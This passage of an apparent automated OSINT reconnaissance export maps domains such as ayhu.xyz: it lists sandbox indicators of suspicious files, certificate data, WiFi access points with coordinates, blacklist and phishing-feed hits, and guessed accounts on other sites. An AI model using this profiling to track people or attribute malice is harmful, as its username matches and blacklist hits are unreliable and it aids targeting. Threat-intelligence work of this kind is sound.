"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d00_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d00_IESQMMUTEX_0_519"\n "IsoScope_d00_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3328"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d00_IE_EarlyTabStart_0x424_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "54.196.16.164:80"\n "99.84.238.168:80"\n "99.84.238.168:443"\n "99.84.224.224:80"\n "99.84.224.90:80"\n "99.84.224.108:80"\n "99.84.224.214:80"\n "99.84.224.3:80"\n "99.84.224.217:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"TR7K5OKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TR7K5OKT.txt]- [targetUID: 00000000-00003328]\n "73DA0AE306CF69ADAC457DB6B2997338" has 
type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00001732]\n "~DFC7FE55AAA15340B0.TMP" has type "data"- Location: [%TEMP%\\~DFC7FE55AAA15340B0.TMP]- [targetUID: 00000000-00003328]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003328]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00003328]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00001732]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00001732]\n "2C9HMCBU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2C9HMCBU.txt]- [targetUID: 00000000-00003328]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003328]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00001732]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00001732]\n 
"7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003328]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003328]\n "BCB67D7ECB470284AF35679F339E879F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BCB67D7ECB470284AF35679F339E879F]- [targetUID: 00000000-00001732]\n "~DF9154BC8BBA72FEBA.TMP" has type "data"- Location: [%TEMP%\\~DF9154BC8BBA72FEBA.TMP]- [targetUID: 00000000-00003328]\n "FVK5E2PX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FVK5E2PX.txt]- [targetUID: 00000000-00003328]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003328]\n "~DF4D25D5B6C6F1C182.TMP" has type "data"- Location: [%TEMP%\\~DF4D25D5B6C6F1C182.TMP]- [targetUID: 00000000-00003328]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd" seems to be random\n "www.herokucdn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hilarious-kelpie-473db1.netlify.app/"- [Source: Input]\n Pattern match: 
"https://hilarious-kelpie-473db1.netlify.app"- [Source: Input]\n Pattern match: "www.herokucdn.com"- [Source: PCAP]\n Pattern match: "http://unsub1.cfd/"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootg2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootca1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEA11CXliCX0s5ZbPbTWItcU%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: 
"crl.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /sca1b-1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.sca1b.amazontrust.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_ |
| 2023-05-12 02:57:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 7 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
| ayhu.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F0:8C:65) | 37.7642, -122.3993 |
| 2023-05-12 02:44:14 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz:443 | pics.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:49:B4) | 34.0544, -118.244 |
| 2023-05-12 03:10:24 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.97.1 | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Poshmark (Category: shopping)
https://poshmark.com/closet/login | login |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:B0) | 41.8781, -87.6298 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs-guest (Net ID: 00:06:B1:28:66:5F) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wavelan network (Net ID: 00:02:2D:0E:29:C9) | 34.0544, -118.244 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/ein_1.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:00:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.11): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/login | login |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:8443 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:D7:22:4A) | 39.0469, -77.4903 |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | rathook.cc | rathook.cc |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:00:94:CB:58:1E) | 41.8781, -87.6298 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dilara (Net ID: 00:12:BF:56:97:E9) | 40.2024, 29.0398 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Wikipedia (Category: news)
https://en.wikipedia.org/wiki/User:Altpapier | Altpapier |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:41:52 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 44486 | 45.131.109.53 |
| 2023-05-12 03:00:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.20): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000magda0000.github.io]
https://www.openphish.com/feed.txt | 0000magda0000.github.io |
| 2023-05-12 02:46:04 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:03'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'34.74.170.74', u'continent': u'North America', u'region_iso_code': u'SC'} | 34.74.170.74 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:07:40:61:40:4D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:45:47 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8001::153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Tenor (Category: images)
https://tenor.com/users/ayhu | ayhu |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Hangar6 (Net ID: 00:02:6F:E9:36:AC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=90 @ 66, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 112, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 54, 'Image XResolution': (0x011A) Ratio=72 @ 74, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 124, 'Image YResolution': (0x011B) Ratio=72 @ 82, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 136, 'EXIF ExifImageLength': (0xA003) Long=3088 @ 160, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 100, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 42, 'EXIF ExifImageWidth': (0xA002) Long=2316 @ 148, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 172} | https://funny.battleb0t.xyz/images/carti_3.JPG |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | opensource (Category: tech)
https://opensource.com/users/login | login |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.109.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6565 7241 (Net ID: 00:00:C5:D7:5E:64) | 41.8781, -87.6298 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.156): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:05:13:41) | 50.1188, 8.6843 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^E^W^B^H^Y^B^I^L^G^R^_^W^H^S^^ (Net ID: 00:02:2D:6D:79:1B) | 37.7642, -122.3993 |
| 2023-05-12 02:47:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:43:34:F0) | 50.8897, 6.0563 |
| 2023-05-12 03:01:24 | Raw Data from RIRs | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:07:56:EF) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F7C2 (Net ID: 00:1D:D2:C6:F7:C0) | 32.8608, -79.9746 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Blogspot (Category: blog)
http://ayshoo.blogspot.com | ayshoo |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6
